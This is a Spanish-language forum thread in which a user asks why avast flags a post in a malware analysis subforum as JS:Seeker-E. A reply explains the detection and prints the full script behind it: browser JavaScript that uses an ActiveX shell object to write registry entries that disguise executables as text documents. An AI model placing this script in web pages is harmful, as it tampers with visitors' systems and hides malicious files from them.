avast! infection detected en subforo analisis y diseño de malware

[xiruko]

buenas gente,

alguien sabe por que puede darme este aviso al entrar en algunos temas en el subforo de analisis y diseño de malware?

me ha dado 2 en apenas 20 segundos, y el aviso es de este estilo:

Infection detected!
avast! Web shield has detected a threat.
Infection: JS:Seeker-E [Trj]
URL: http://foro.elhacker.net/analisis_y_diseno_de_malware/tutorial_para_hacer_indetectable_cualquier_archivo-t359656.0.html;msg1738804;boardseen

decir que hace 2 o 3 semanas que lo tengo instalado y que vengo navegando por el foro y nunca me habia dado ninguna alarma.

agradeceria cualquier ayuda... gracias!

[r32]

Hola xiruko como puedes ver en la alerta es por un script del siguiente code:

Código [Seleccionar] Expandir

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

</script>

Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar.
Aquí tienes el script analizado en Jotti:

Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4

2012-04-21 JS:Seeker-E

Saludos y gracias por el aviso !!!

[xiruko]

vaya era por un code escrito en el post... me extraño ya que era la primera vez que me pasaba, y diria que no era la primera vez que veia un post con codes de este estilo.

bueno muchas gracias por la aclaracion!